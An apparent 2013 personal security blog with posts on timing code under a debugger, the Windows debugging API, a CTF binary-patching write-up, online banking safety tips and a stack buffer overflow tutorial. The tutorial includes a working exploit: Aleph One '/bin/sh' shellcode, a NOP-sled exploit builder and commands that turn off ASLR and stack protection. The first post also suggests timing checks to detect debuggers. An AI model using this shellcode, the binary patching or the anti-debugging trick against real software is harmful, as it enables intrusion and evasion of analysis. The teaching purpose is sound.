October 4, 2013

Timing Your Code - Inside and Outside a Debugger

John Bentley talks about timing software code in his book Programming Pearls. I was recently reading this and thought I'd time my hashtable implementation(source). Windows has two APIs that can help in doing this: QueryPerformanceFrequency and QueryPerformanceCounter. There are other ways to measure time but I chose these for their high resolution. These APIs provide values from the high-performance counter in the system, if one is present. This counter is like a variable that keeps incrementing many many times per second. The frequency of increments depends on the specific system you have. MSDN says that sometimes this can be the cycle rate of the processor's clock.

QueryPerformanceFrequency returns this frequency value and this value does not change during the system's up-time operation. My system, for example, has a counter that ticks 2143623 times per second and this translates to a resolution of 466.499940 nanoseconds.

QueryPerformanceCounter returns the value of the counter when it is called. By calling this immediately before and after a block of code, we can calculate the number of increments that took place while the code was running and then convert this to a time value. Both the APIs take a pointer to a LARGE_INTEGER variable. If we look in WinNT.h, we see that this is an 8-byte structure with members for accessing each of the 4-byte values. 8-bytes gives plenty of bits to hold the counter value.

Coming to the timing of the hashtable implementation. I timed only the insertion operation using a DWORD type for both key and value. Ran the tests with multiple number of entries each time: 50000, 100000, 700000, 8388608(1<<23), 16777216(1<<24). I initially had a count of 33554432(1<<25) and this run failed because of an out-of-memory condition! Each process by default is limited to 2GB of main memory space. Part of the scaffolding code I used for this is here:

LARGE_INTEGER freq = {0};
LARGE_INTEGER counterStart = {0};
LARGE_INTEGER counterEnd = {0};

LONGLONG elapsedCounts = 0;
double elapsedTime[10] = {0};

int numRuns = 0;
int sizes[MAX_RUNS] = { 50000, 100000, 700000, 1<<23, 1<<24 };

DWORD dwError = 0;
BOOL testSuccess[MAX_RUNS] = {TRUE};

// This retrieves the counts per second
if(!QueryPerformanceFrequency(&freq))
{
    dwError = GetLastError();
    wprintf(L"testHashtable(): QueryPerformanceFrequency() failed %d\n", dwError);
    return;
}

while(numRuns < MAX_RUNS)
{
    wprintf(L"Beginning run %d\n", numRuns);

    // Begin counter
    if(!QueryPerformanceCounter(&counterStart))
    {
        dwError = GetLastError();
        wprintf(L"testHashtable(): QueryPerformanceCounter() failed %d\n", dwError);
        return;
    }

    //
    // Code to test
    //
    testSuccess[numRuns] = testHashtable(HT_KEY_DWORD, HT_VAL_DWORD, 
                                         sizes[numRuns], FALSE);

    // End counter
    if(!QueryPerformanceCounter(&counterEnd))
    {
        dwError = GetLastError();
        wprintf(L"testHashtable(): QueryPerformanceCounter() 
                  failed %d\n", dwError);
        return;
    }

    // Get the elapsed time
    elapsedCounts = counterEnd.QuadPart - counterStart.QuadPart;
    elapsedTime[numRuns] = (double)(elapsedCounts / (double)freq.QuadPart);
    ++numRuns;
}

wprintf(L"Performance counter ticks %I64u times per second\n", freq.QuadPart);
wprintf(L"Resolution is %lf nanoseconds\n", (1.0/(double)freq.QuadPart)*1e9);

wprintf(L"%16s %13s %19s %s\n-----------------------------------------------\n",
        L"RunSize", L"TimeSeconds", L"TimeMicro", L"Result");

for(numRuns = 0; numRuns < MAX_RUNS; ++numRuns)
{
    wprintf(L"%16d %5.8lf %16.3lf %s\n", sizes[numRuns], elapsedTime[numRuns], 
                                         elapsedTime[numRuns] * 1e6, 
                                         testSuccess[numRuns]?L"PASSED":L"FAILED");
}

This code gave the following output:

--[ Hashtable insertion operation ]--

** Release mode, running inside Visual Studio **
         RunSize   TimeSeconds           TimeMicro Result
---------------------------------------------------------------
           50000 3.25054825      3250548.254 PASSED
          100000 6.17252521      6172525.206 PASSED
          700000 45.90315601     45903156.012 PASSED
         8388608 648.03144909    648031449.093 PASSED
        16777216 1480.01800177   1480018001.766 PASSED
---------------------------------------------------------------

** Release mode, running outside in a command window **
         RunSize   TimeSeconds     TimeMicro Result
---------------------------------------------------------------
           50000 0.07000345        70003.447 PASSED
          100000 0.12546702       125467.025 PASSED
          700000 0.98070789       980707.895 PASSED
         8388608 11.25297219     11252972.188 PASSED
        16777216 19.48300751     19483007.506 PASSED

As you see from the results above, the interesting learning is the amount of increase in processing time when running under a debugger. In these tests, running under a debugger was orders of magnitude slower than otherwise. In order to see whether this really was the case with even simple code, I timed the execution of a system API - GetCurrentThread() using the same technique. In order to get consistent times I executed the system API multiple times in a for loop. Here are the results. We see the same increase in execution time. The RunSize is the number of times GetCurrentThread() was executed in TimeSeconds seconds. Do note that this API took only ~366 microseconds to execute 100,000 times on my Core i7 powered laptop. That is blazing fast!

--[ Multiple Calls to GetCurrentThread() ]--

** Release mode, inside Visual Studio **
         RunSize   TimeSeconds TimeMicro
---------------------------------------------------------
             500 0.00000746            7.464
           50000 0.00062698          626.976
          100000 0.00125349         1253.485

** Release mode, running outside in a command window **
         RunSize   TimeSeconds TimeMicro
---------------------------------------------------------
             500 0.00000187            1.866
           50000 0.00016747          167.473
          100000 0.00033635          336.346

This brings us to another interesting idea that is probably already being used. This technique can be used by a program to check whether it is running under a debugger or not. I recall reading somewhere that using IsDebuggerPresent() is not a fool-proof way of determining this. So timing checks may well be better. However, we must account for the fact that processing times vary widely depending on the system hardware and system load while running. What can be done is draw up a table with a list of expected processing times for a particular operation on various types of hardware configurations and for various system loads. Then when our program is running, we time the same operation and compare it against the list we have. The program must be able to determine the hardware configuration(CPUID instruction comes to mind) and the system load(can do this by querying Windows - #processes, memory used,...) and use this information to make a good comparison.

September 17, 2013

Windows Debugging API - Part 1

I recently started exploring the Debugging APIs available in Microsoft Windows. Using these APIs, one can write their own software to write a debugger, process tracer/analyzer and what not. My goal is to write a full-fledged debugger using only Win32 APIs by the end of this learning stage. In today's post, I will explain what I have learned so far - some of the Debugging APIs themselves and a sample implementation of a so called process tracer, for lack of a better name, which uses those APIs.

The debugging APIs available in the Windows OS have been remained largely unchanged for many years now. Articles written way back in the 90s and 2000s are relevant even today. Scroll down to the end of this post to find some references that I have used so far. Before going in to the details of the APIs themselves, I will enumerate the tasks that a debugger should be able to perform in order to satisfy the user's requirements.

First and foremost, the debugger must enable the user to fully control the execution of the process to be debugged, called the target process from here on. This means that the user must be able to start and stop execution of the target by setting breakpoints, single stepping, break-all threads immediately and so on.
The user must also be able to control the data that the target process uses - register contents(even the EIP register to alter control flow), stack and heap contents, global variables and so on.
Provide at least a disassembly of the code that the target process is executing whenever the user wishes to examine it.
It must provide all details about the target process during its execution - threads, child processes, register and memory contents, loaded modules(DLLs), address in memory of the modules, current stack layout and so on.

The Windows debugging APIs consists of:

WaitForDebugEvent: The caller is blocked for the amount of time indicated or until a debug event occurs in the target process. When this function returns TRUE, a debugging event has occured and at this point the target process has been suspended completely. The debugger(caller) is free to process the debug event and update its own UI and do other stuff.
ContinueDebugEvent: Once the debugger(caller) has processed the debug event, it has to call this function in order to let the target process continue execution.
DebugActiveProcess: This enables the debugger to attach to an already running process in the system.
DebugActiveProcessStop: DebugActiveProcess() function's counterpart. This is used to detach the debugger from the target process. Once this is done, the target process is no longer under the control of the debugger and the debugger will not receive any debug events.

There are other debugging APIs which I have not used so far, so I will explain them in a future post. They are: DebugSetProcessKillOnExit(), DebugBreakProcess() and CheckRemoteDebuggerPresent(). Important APIs that are not specific to debugging but are very necessary for accomplishing the tasks of a debugger:

CreateProcess(): This is used to create the target process as a new process with the DEBUG_PROCESS or the DEBUG_ONLY_THIS_PROCESS flag which enables the calling thread in the debugger to receive debug events from this target process.
SuspendThread() and ResumeThread(): Suspend and resume a thread in the target process.
TerminateThread() and TerminateProcess(): To terminate a thread or the target process itself.
ReadProcessMemory() and WriteProcessMemory(): To read and write to the memory contents of the target process. These are essential because there is no direct way to access the target process's memory like using a pointer in the debugger. This is because the target process, obviously, is created in a different virtual address space than the debugger.

Before going into the details of the APIs, I will give a brief of the various events that a debugger will receive when it is attached to a target process. A DEBUG_EVENT structure is sent along with each debug event. This event has the target PID, thread ID where this debug event occurred and an associated structure inside that is filled with information related to the corresponding event. These structures contain very useful information about the target process. The debug events sent are:

CREATE_PROCESS_DEBUG_EVENT: This event is the very first event sent to the debugger when it creates a new target process or attaches to an existing process. The associated structure is CREATE_PROCESS_DEBUG_INFO. Important fields are:
- hProcess, hThread: handle to target process and the first thread.
- hFile: Handle to the memory area where the executable binary(of the target process) is mapped into memory. Use this to read information about the target binary for may be disassembly generation purposes. You must close this handle once you are finished using it.
- lpBaseOfImage: The starting address of the executable image mapped into memory. For PE binaries, you will see that this points to the DOS header with "MZ" at the start.
CREATE_THREAD_DEBUG_EVENT: Event sent whenever a thread is created in the target process. The associated structure is CREATE_THREAD_DEBUG_INFO. The hThread member in this gives a handle to the thread.
LOAD_DLL_DEBUG_EVENT: This is sent when a DLL is loaded into the target process. hFile is the handle to the loaded DLL and can be used to obtain the image name of the DLL and must be closed after use. lpBaseOfDll gives the address at which the DLL is loaded in the target process's address space.
OUTPUT_DEBUG_STRING_EVENT: This is a special event that is sent when the target process a call to the OutputDebugString() function. This is used especially for the target process to be able to communicate to the debugger. The associated OUTPUT_DEBUG_STRING_INFO structure contains information needed to retrieve the string value passed to the OutputDebugString() function. lpDebugStringData gives the starting address of the string and nDebugStringLength gives the number of characters in the string. fUnicode specifies whether the string is a wide-char string or not. ReadProcessMemory() must be used to actually read the string value from the target process's address space. Keep in mind that if it is a unicode string then you will have to read length*sizeof(WCHAR) bytes in order to read the full string.
EXIT_PROCESS_DEBUG_EVENT and EXIT_THREAD_DEBUG_EVENT: Counterparts of the respective create events. Keep in mind that you will have to remember the PID of the target process so that when you receive the EXIT_PROCESS_DEBUG_EVENT with this PID, you will know that the target process has exited.
UNLOAD_DLL_DEBUG_EVENT: Sent when a DLL is unloaded in the target process. The only member in the associated UNLOAD_DLL_DEBUG_INFO structure is lpBaseOfDll which is the same as before. See that there is no information about which DLL is being unloaded. The debugger has to remember this information by mapping the base of DLL to the DLL name when it gets the LOAD_DLL_DEBUG_EVENT and can use this information when it receives the unload DLL event.
EXCEPTION_DEBUG_EVENT:Sent to the debugger whenever an exception occurs in the target process. The structure EXCEPTION_DEBUG_INFO has information about the exception itself. First chance exception means the exception has not yet been sent to the target process yet. The debugger is the first one to receive and can make use of it before it reaches the target process. This is useful when the debugger sets breakpoints which result in the breakpoint exception. In this case, the debugger handles the breakpoint exception and continues the target process. The target won't even know that an exception occurred in this case. If the debugger cannot handle the exception then it is passed onto the target process. The exception debug information structure also contains the exception code which indicates the kind of exception that occurred. There is a lot more detail to be written regarding the exception debug event and I will reserve that for the second part of this post.

Now, there are two starting points for debugging a target process - first is to create the new process as a child of the debugger using the CreateProcess() API and second, attach to a process that is already running using the DebugActiveProcess() API. Likewise, there are two ways to end a debug session - terminate the target using TerminateProcess() API or simply detach from the target using DebugActiveProcessStop() API and let it continue executing. Going into the specifics now...

Creating a new target process
You must specify the DEBUG_PROCESS or the DEBUG_ONLY_THIS_PROCESS flag while creating the new target process so that the debugger has full access to the target process. When this function returns, you will get the PID of the newly created target process and a handle to its main thread and the target process itself. It is better to close these handles now since we get these again later when the debugger receives the CREATE_PROCESS_DEBUG_EVENT. Once you the create the target process the following set of events happen from the debugger's perspective:

Attaching to an active target process
When DebugActiveProcess() function is called, the target process is first suspended by Windows. Then the following events are sent to the debugger: CREATE_PROCESS_DEBUG_EVENT and CREATE_THREAD_DEBUG_EVENT for the main process and thread, CREATE_THREAD_DEBUG_EVENT for all other threads currently in the target process and LOAD_DLL_DEBUG_EVENT for all loaded DLLs. Windows sends one EXCEPTION_DEBUG_EVENT with exception code 0x80000003(breakpoint) before resuming execution of the target process. So once the debugger continues this exception, the target process is resumed and now any debug event may be sent to the debugger as and when they are generated.

Receiving debug events
Debug events are sent to the debugger, specifically the thread within the debugger that called either CreateProcess() or DebugActiveProcess(), once it is attached to the target process. In order receive these events, the debugger must call the WaitForDebugEvent() API. This blocks the calling thread until a debug event is sent or the specified time runs out. If a debug event is sent within the specified time out, then a DEBUG_EVENT structure is sent along as described earlier. Calling ContinueDebugEvent() resumes execution of the target process.

Closing a debug session
Similar to starting a debugging session, there are two ways to end it.
First is to terminate the target process and the second is to simply detach the debugger from the target process and let it continue execution. Termination of a process is via the TerminateProcess() API. Many people recommend not to use this because it immediately terminates the target process without invoking any cleanup code in the target. However, if the user wants to stop debugging, the target process must be terminated this way because giving it a chance to cleanup first is the total opposite of wanting to terminate the process. Think about it - if you are debugging a malware you would not want to give it a chance to cleanup, would you?

Coming back to TerminateProcess() now. There is one thing you should absolutely remember not to do: do not exit the debug thread as soon as you call TerminateProcess. Doing so keeps the target process in an infinite wait state and it cannot even be killed. See the appendix for an explanation. Once TerminateProcess() has been called, the target process is suspended and Windows sends UNLOAD_DLL_DEBUG_EVENT for all loaded DLLs, EXIT_THREAD_DEBUG_EVENT for all threads and finally a EXIT_PROCESS_DEBUG_EVENT. Once all these events are processed, Windows calls CloseHandle and other clean-up code for any resources held by the target process and then proceeds to remove the process from the system.

Second, detaching from the target process is by calling the DebugActiveProcessStop() API. This simply causes the debugger to stop receiving any further debug events and closes all the debugger's open handles to the target process. From now on, the target process continues executing without an attached debugger. Any exception that occurs is handled by Windows the same way as for any other process.

Using these APIs
I wrote a small GUI program called ProcessTracer that receives debug events and displays them to the user. Source code for this can be found in Github here: ProcessTracer git repo.

Appendix

Terminating the target process
When TerminateProcess() is called, the target process is suspended just like when a debug event occurs. Windows then sends multiple UNLOAD_DLL_DEBUG_EVENTs and EXIT_THREAD_DEBUG_EVENTs followed by a final EXIT_PROCESS_DEBUG_EVENT. All this happens without the target process being resumed at all. So if the debugger does not process these events by calling ContinueDebugEvent() then the target process is in a wait-forever state within a kernel thread. Since this is in a kernel mode wait state it cannot be killed. See this article for an explanation of un-killable processes.

July 18, 2013

Modifying a Binary File?

In this post I will be talking about how I cracked one of the CTF challenges during the final semester in my university. The CTF competition was part of the Network Security course and was held for two days over a weekend in spring. Those two days were one of the most exciting times I have spent in front of a computer. The adrenaline rush of solving problems and getting points awarded is something that only the participants will know about.

So, coming to the challenge I'm talking about. Given were: a program binary that provides encryption/decryption services, an encrypted message and the key that was used to encrypt the message. The challenge was to decrypt the encrypted message. But.... Decryption capability in the program binary was disabled! The program took the following command line arguments "Usage: ./crypt INPUT-FILE OUTPUT-FILE KEY (DECRYPT|ENCRYPT)". So if we mentioned "DECRYPT" it would output "NO DECRYPT ENABLED !!!". Okay, so I opened up the GNU debugger gdb. Started stepping through code to see where the command line arguments were processed. I observed that the function names were still preserved, although they were mangled because the C++ compiler implements name mangling. There were two functions, '_Z7decryptSsSs' and '_Z7encryptSsSs' apart from the 'main' function. Stepping one instruction at a time through the main function I found the code where the command line argument was being checked for DECRYPT/ENCRYPT. Here it is:

Observe that the code is checking only whether the fifth argument's first character is 'D' or not. D is hex 44h. So if it is 'D' then register al is set and then the stack variable at [ebp-0x239] is also copied the value of al. The code then checks whether this value is zero, meaning 'E' was the first character of the fifth parameter, and then jumps based on this comparison. If the jump is not taken then the code calls std::cout to print the "NO DECRYPT ENABLED !!!" message and exits. When "ENCRYPT" was passed, jump was taken and the stack variable [ebp-0x236] was being used further down in the code when the decision was made to call either _Z7encryptSsSs() or _Z7decryptSsSs(). So the basic steps the code was taking is shown in this pseudo-code:

main()
{
  // x = ebp-0x239
  al = (argv[4][1] == 'D')? 1 : 0;
  x = al;
  if(x == 0) goto do_not_exit;
  std::cout << "NO DECRYPT ENABLED !!!\n";
  exit_program

  do_not_exit:
  read input file
  read key file
  open output file
  if(x == 1)
    call _Z7decryptSsSs()
  else
    call _Z7encryptSsSs()
  exit_program
}

As you can see there are two places where the control flow changes. Two ideas came to my mind on that day.

Control the stack variable 'x' so that the correct branches are taken even though "DECRYPT" is passed.
Change the binary file so that the call to the encrypt() function gets replaced with a call to the decrypt() function.

I chose the first option since it was easier. However I didn't quite succeed because the [ebp-0x239] was being over-written when some library functions were called. GDB has the functionality that enables you to monitor a memory location and break whenever a read/write operation is performed from/to that memory location. I tried using this but got tangled up in multiple places where this memory area was accessed. It was taking too much time. I then thought of the second option. For changing the binary file, all I had to do was to modify the target of the call instruction to point to the decrypt function instead of the encrypt function. The intel call instruction takes the target as an offset which means the call instruction simply does this to call a function: EIP = EIP+offset. See the disassembly below:

The call instruction at 0x080494ee is "e3 e1 f8 ff ff". Call opcode is 0xe3 and the code_offset is 0xfffff8e1. All we have to do is replace the immediate value 0xfffff8e1 by the new offset 0xfffffa1b. This will be the new offset that the call instruction will use. Simple enough right? Well... sort of. This binary was a 32bit ELF binary. We can use "objdump -h" to find out the offset of important sections of a binary file. What we are interested in is the offset of the .text section. The output of "objdump -h" (only .text information shown here):

The text section starts at offset 0xd20 in the binary file and its virtual address is 0x08048d20. The call instruction is at 0x08484ee. So, 0x08494ee - 0x08048d20 = 0x7ce. This is the distance between in the start of text section and the call to encryption routine instruction. Therefore, the call instruction is at offset 0xd20 + 0x7ce = 0x14ee in the binary file. The call instruction format is "opcode(1byte) code_offset(4bytes)". So we have to replace the integer(4bytes) at offset 0x14ee+1 with 0xfffffa1b. I wrote a program to do this by memory-mapping the binary and replacing the code_offset. Of course, we can simple open the file, seek to 0x14ee+1 and write an integer there but the reason I used memory mapping is because I wanted to see if I was modifying the correct place in the binary file and memory-mapping enables you to do this easily since you can view the file contents in the memory window of a debugger. Small snippet of the code to make the modification:

WCHAR *szFile = L"C:\\Users\\Shishir\\CTF\\kes\\crypt";
WCHAR *szOutFile = L"C:\\Users\\Shishir\\CTF\\kes\\crypt_new";
HANDLE hFile = NULL, hFileObj = NULL, hFileView = NULL;

DWORD dwFileSize = 0;

wprintf_s(L"Using input file: %s\n", szFile);

if( ! fOpenAndMapFile(szFile, &hFile, &hFileObj, 
        &hFileView, &dwFileSize) )
{
  wprintf_s(L"Error opening input file\n");
  return 1;
}

unsigned char *fptr = (unsigned char*)hFileView;

// Seek to offset where the call instruction's code_offset is
fptr += 0x14ee + 1;
    
unsigned int *iptr = (unsigned int*)fptr;
int old_data = *iptr;
int new_data = 0xfffffa1b;
*iptr = new_data;

Once this was done, I took the new modified binary and did an objdump of it and the call instruction at 0x08494ee was pointing to the decryption routine _Z7decryptSsSs() now!! Note the virtual address, 0x080494ee, is where the call instruction is in the following modified code and in the previous screenshot.

Executed the program by giving "ENCRYPT" as the fifth argument and got the decrypted message in the output file! Now, this was possible because the decryption and encryption routines both had the same function signatures - same arguments especially - so the code that setup arguments on the stack before the call to _Z7encryptSsSs() did not have to be changed.

Well, after submitting the flag and getting rewarded handsomely with points, I spoke to a fellow student who did it in a different, more easier, way. GDB allows you to control the contents of any register during debugging. So all you have to do is to make sure you break the program before each of the branching decision points and change the value of EIP register so that the correct branch is taken even though you specify "DECRYPT" at the command line. Anyway, it was fun playing around with gdb, objdump and the binary file even though my method was more complicated!

This actually brings us to the topic of packers. A packer, in the context of computers and security, is a program that can compress and/or encrypt a binary file that is provided as input. This is how many of today's software programs are distributed in order to protect Intellectual Property. The compressed/encrypted binary is the one that is distributed to consumers. This supposedly prevents competitors and crackers from reverse engineering the binary and stealing the code implemented by a company. You might ask how the OS manages to run these 'packed' programs. When a binary file is packed, the unpacker is included as part of the final output of the packer. So executing the output binary file actually first invokes the unpacker which has the logic and information to unpack - decompress and/or decrypt - the rest of the binary and then execute the unpacked program. The unpacked program is usually run by creating a child process by the unpacker. UPX is a popular open-source packer.

Even with packed a binary, we can still read the original code although it is a little more difficult. This difficulty arises because many packers are clever enough to not unpack everything at once. Unpacking may be done 'on-demand' and in-memory. So the challenge now is to determine when the unpacking process is finished and at this point we can dump the process's memory to disk for later analysis. The dump will hopefully have the whole binary in unpacked form to facilitate disassembly. This is why one must never ever depend on the fact that the source code will never be leaked. Remember, security through obscurity never works. The topic of packers and techniques for anti-packing and vice-versa is very interesting. I will write about it may be in a later post. That's it for now!

May 23, 2013

Online Banking Safety

Online banking is getting more and more popular these days and it is not without reason that it is so pervasive. As the world goes towards higher levels of connectivity, online banking looks like a very convenient, easy-to-use option for many of the internet connected individuals all over the world. It is here to stay for a long time to come. However, as is with everything else on the internet, online banking has its own set of security issues and problems. Most people are still in the dark about these issues and have no clue about the dangers of carrying out online banking. See this blog for a proof-of-concept that shows how even the two-factor authentication mechanism, used by banks to verify customers online, can be bypassed. There are a couple of popular malicious software kits that can be used to carry out attacks against online banking customers - Zeus, SpyEye and their mobile phone counterparts ZitMo and SpitMo.

In this post, I will enumerate the important things you can do to stay safe while continuing use of online banking. These points must be followed apart from the general security tips like keeping software up-to-date and having an up-to-date antivirus software. I will keep this post short and will not go into detailed explanation of each step. Keep in mind that security and usability are inversely proportional and as such you must give up usability to a certain extent in order to have an increased level of security. On any day I would go in for more security than usability because that would give me peace of mind!

--[ System/OS Security ]--
Although the browser is the program you use to access banking websites, it is the underlying Operating System and related softwares that must be secured first because no matter how secure the browser is, a keylogger can capture your typed-in password even before it reaches your browser.

Having a squeaky clean OS before accessing your bank's website is a must. This means the computer must have no trace of any malicious programs such as trojans, viruses and backdoors. Bootkits pose a more serious problem but I'll leave it for another blog post.
The people at Software Protection Initiative have come out with a lightweight Linux based OS that boots from a CD or USB-stick every time. Since the OS can only be booted from the live CD or USB-stick, it is ensured that each session starts in a trusted state. No malware ever gets 'installed' on the system. Simply restarting the system enables you to start from a clean state. Download the latest ISO image here. Read more about the OS here.
One disadvantage of using this is the issue of having to reboot/boot your machine after inserting the live CD or USB-stick. An easier but less secure option is to boot this OS inside a Virtual Machine(VM). I have personally used Oracle's VirtualBox to boot this OS and it works just fine. The reason this option is less secure is because the host-OS (the OS on which the VM runs) cannot be trusted - a keylogger installed in the host-OS can still capture your keystrokes.
Always boot a new session immediately before accessing your banks' websites. The LPS OS comes installed with Firefox for browsing. Also, this Firefox comes with the HTTPS-Everywhere plugin that enforces use of the secure HTTP protocol(HTTPS) whenever available.

--[ Browser Security ]--
The browser is the main software program that you use to access your bank website and from which you perform various things - checking account balance, transferring funds, adding peer accounts and so on. Having a secure browsing environment is a must and everyone should make this a priority.

If you choose not to use the live CD/USB option, then you must at least have a secure browser software, apart from having up-to-date antivirus and other up-to-date software patches.

First of all, we must try to use the secure version of HTTP, i.e., HTTPS, for all websites that offer it. In order to make this easy for users, the Electronic Frontier Foundation have come up with a plug-in for Firefox and Chrome web-browsers - HTTPS Everywhere. This plug-in tries to enforce the use of HTTPS versions of websites for all websites that offer the secure versions. This ensures that the connection between your browser and bank server is encrypted(confidential) from attackers in the network.
Second, preventing malwares from being installed on your system. Most malwares get installed via drive-by downloads which enable installation of malware on a user's computer without his/her knowledge. Install the plug-in NoScript for Mozilla Firefox and ScriptSafe for Google Chrome. These scripts block javascript, IFrames, XSS and other attack vectors.
Since Java has been the most favored base for exploits by attackers, please disable the Java plugin in your browsers. In Firefox, go to Tools > Add-Ons > Plugins and disable the Java SE and Java Deployment Toolkit plugins. In Chrome, enter "chrome://plugins/" in the address bar and click 'Disable' for the Java plugin. For other browsers see here. You can even disable the Shockwave Flash plugin the same way since most bank websites do not use flash content.
Keep an eye on the address bar of your browser for any abnormalities in the website address. Depending on the font used, two characters may look alike but point to very different websites - GOOGLE.COM vs. G00GLE.COM, PAYPAI.COM vs. PAYPAl.COM, rnicrosoft.com vs. microsoft.com. If a website address appears to be different, copy the address into the notepad application and choose a monospace font such as Courier New. Using this font, you can clearly see the difference between characters. You must do this even for links before you click them. Copy the target website address of a hyperlink to notepad and perform the same verification.
Type the complete website address starting from 'https' manually and do not reach your bank website by clicking on any link. This ensures that you reach the intended website only.
Use two different browsers - one solely for online banking purposes and the other for anything else you do on the internet. The one you use for online banking purposes must be completely secure using the above mentioned use of plugins.

May 22, 2013

Stack-buffer Overflow Vulnerability

We read about many many malwares that are causing havoc in today's computers. How do they get into a computer in the first place? Memory vulnerabilities are one of the main ways in which a malware exploits the target computer.

The goal of any malware writer is to somehow get his malicious code to be executed on the victim computer. There are two ways to go about doing this. One way is to make the user himself execute the malicious executable, for example, using a phishing email that asks the user to open a malicious attachment. However, the malicious code often will have to be executed with elevated privileges, like an admin account, so that it can perform its evil deeds. In this case, the malware writer can choose to inject his code into a running process that already has admin privileges and causes the CPU to execute the injected code when the victim process is running. So the malicious code also has admin privileges. This requires that the victim process take some user input through which the malicious code can be injected into the victim process. For this to work properly, there are two phases – Code Injection and Instruction Pointer hijacking. Code Injection is when the malicious code is inserted into the victim process's memory by supplying the code – shell code – as user input that is unfiltered, and Instruction Pointer hijacking is the process of making the instruction pointer register (EIP) point to the injected malicious code. IP hijacking is also called Control Flow hijacking because the program's control flow is being redirected to the injected code.

Code Injection is pretty straight forward because many programs take input from the user without filtering them for malicious content. The programs take the input and place it somewhere in memory – stack or heap. From here on, the task of the malware writer is to ensure that the CPU executes this injected code somewhere in the near future by modifying the contents of the EIP register.

To understand how EIP can be modified, we first need to understand the memory layout of a process. There are 4 basic sections in a process's memory – text, data, heap and stack. In most systems the stack always grows down, i.e., two nested function calls means that function1's frame will be at a higher address than function2's frame – eg., 0xff88 vs. 0xff18. This doesn't mean that an array allocated on the stack also grows downwards! For example, an array whose base address is 0xff20 with a size of 20 bytes will have the last element at 0xff34 and NOT at 0xff06. A very good article about process memory layout is Anatomy of a program in memory. So basically when a function is called the return address is stored on the stackby the caller. When the callee returns the saved address is popped off the stack into the EIP so CPU continues executing inside the caller. If we can modify this saved return address value then we are indirectly controlling the EIP.

--[ Stack Buffer Overflow ]--
This is the most basic vulnerability to understand and exploit. What is surprising is that this basic attack was discovered in the 1990s and is still being used for exploits. A simple google search will yield multiple results about recent attacks. I will use the following program to explain the vulnerability.

// stack_vuln.exe
void foo(char *user_str)
{
    char local_str[64];
    strcpy(local_str, user_str);
}

int main(int argc, char *argv[])
{
    if(argc!=2) 
    { printf(“usage: %s <in_string>\n”, argv[0]); return 1; }
    foo(argv[1]);
    return 0;
}

User input is supplied via command line arguments and is passed to the function foo() by main(). foo() has a local char array of size 64, i.e., allocated on the stack. It simply copies the contents of the formal parameter *str to the local char array using strcpy(). Remember that strcpy() is very unsafe to use because it performs no boundary checking – very easy to overwrite the destination buffer. This vulnerability is what is being exploited now. Let's look at the stack when control is inside foo() just before executing the call instruction to strcpy().

When strcpy() is passed the address of local_str as destination buffer, it copies the contents of user_str to local_str until a '\0' is encountered. Now, if the source buffer contains a '\0' within the first 64 bytes, everything is fine. But if the length of the source buffer is 72 bytes, it overflows the destination buffer and overwrites the saved EBP and ret_addr. When foo() executes the return instruction, ret_addr is popped off the stack and into the EIP. So if the value of ret_addr can be modified, EIP can thus be controlled.

So how is this exploitable? A classic exploit is to have the remote machine open up a shell for the attacker. We can use Aleph One's shell code as our payload which is 46 bytes in size. The buffer overflow vuln is the attack vector with shell obtaining code as the payload. We now have the shell code but we must still come up with an exploit string that we give as input to the vulnerable program. The exploit string should be like this:

/*
 *         ** Exploit string layout **
 *
 * 0 1 2 3 ... 21  |  22 23 ... 67  |  68 69 70 71
 *      NOPs          shell_code     sip overwrite addr
 *
 */

We have a 64 byte vulnerable buffer on the stack and we have to write 72 bytes so that the saved EIP is overwritten.
We have 72-46-4 = 22 bytes extra space in the exploit string. We will use this to hold NOPs (0x90 instruction) to be used as a landing area. Index 0-21 will hold NOPs.
We store the shell code just behind the EIP overwrite address. Index 22-67 will hold the shell code.
The last 4 bytes will overwrite the saved EIP so the exploit strings's last 4 byte values must be the address of the start of our shell code. This is calculated by determing the address of the vulnerable buffer on the stack by running stack_vuln.exe in a debugger.
This exploit string will be supplied as the first argument to stack_vuln.exe program.

An example exploit string construction may be as follows. Assuming that the vulnerable local_str[] buffer starts at 0xbffffc28, we choose 0xbffffc2e as the target EIP address, we come up with the exploit string below. See, also, how it lines up in the stack area. The saved EIP ret_addr gets overwritten by 0xbffffc2e.

We execute stack_vuln.exe using the execve() system call as follows:

// shellcode from Aleph One's article
static char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

char szExploit[64+4+4];  // 4 for sfp and 4 for sip
int iBufAddr = 0xbffffc2e;

int main()
{  
  char *args[3];
  char *env[1];
  int i, iSCStartIndex, *iptr;

  args[0] = "stack_vuln.exe"; 
  args[1] = szExploit;
  args[2] = NULL;
  env[0] = NULL;

  memset(szExploit, 0x90, sizeof(szExploit)); // set NOPs

  iSCStartIndex = 22;
  for(i = 0; i < sizeof(shellcode)-1; ++i)
    szExploit[iSCStartIndex++] = shellcode[i];

  // Place jump-to-exploit address at the end of our exploit string
  iptr = (int*)(szExploit+68);
  *iptr = iBufAddr;

  if (0 > execve(TARGET, args, env))
    fprintf(stderr, "execve failed.\n");

  return 0;
}

So stack_vuln.exe is exec'd with our exploit string as argv[1] and strcpy() copies this string to the stack buffer local_str and overwrites saved EIP. Finally when the ret instruction is executed in foo(), it takes the overwritten value, 0xbffffc2e, and copies it to the EIP register and CPU will now start executing from this address which has NOPs followed by the shellcode. We now get a new shell opened up for us. If we need a root shell then the target program executable must have setuid(sticky bit set) so that it runs with effective user ID as root(=0).

Caveats:

The exploit string must not contain a NULL byte (value 00) because strcpy() and any other string functions will not copy past the NULL byte.
The stack address changes a little bit when the target program is run under a debugger and when run by itself. I have seen a difference of 32bytes, i.e., local_str was at an address 32bytes lower on the stack when run in a debugger. So you must compensate for this in your exploit string.
Ofcourse, modern operating systems and compilers come with protection against this attack – ASLR, NX bits and stack protection. These must be disabled if you want to try this out(commands specific to Linux).
- Disabling ASLR: sudo echo 0 > /proc/sys/kernel/randomize_va_space
- Removing stack protection: Compile with -fno-stack-protector -z execstack

January 11, 2013

So I Wrote A Disassembler

It was the middle of the Texas summer and I had just returned from India back to USA and had absolutely no work to do since I had not registered for any courses in the summer. Back in India, my mentor suggested that I try my hand at writing a disassembler as a first step to get into the realm of low-level system code, OS internals and system software. So that's exactly what I did. I wrote a disassembler for 32bit windows PE files with support for integer, floating-point, MMX, SSE1 and AES instructions :D

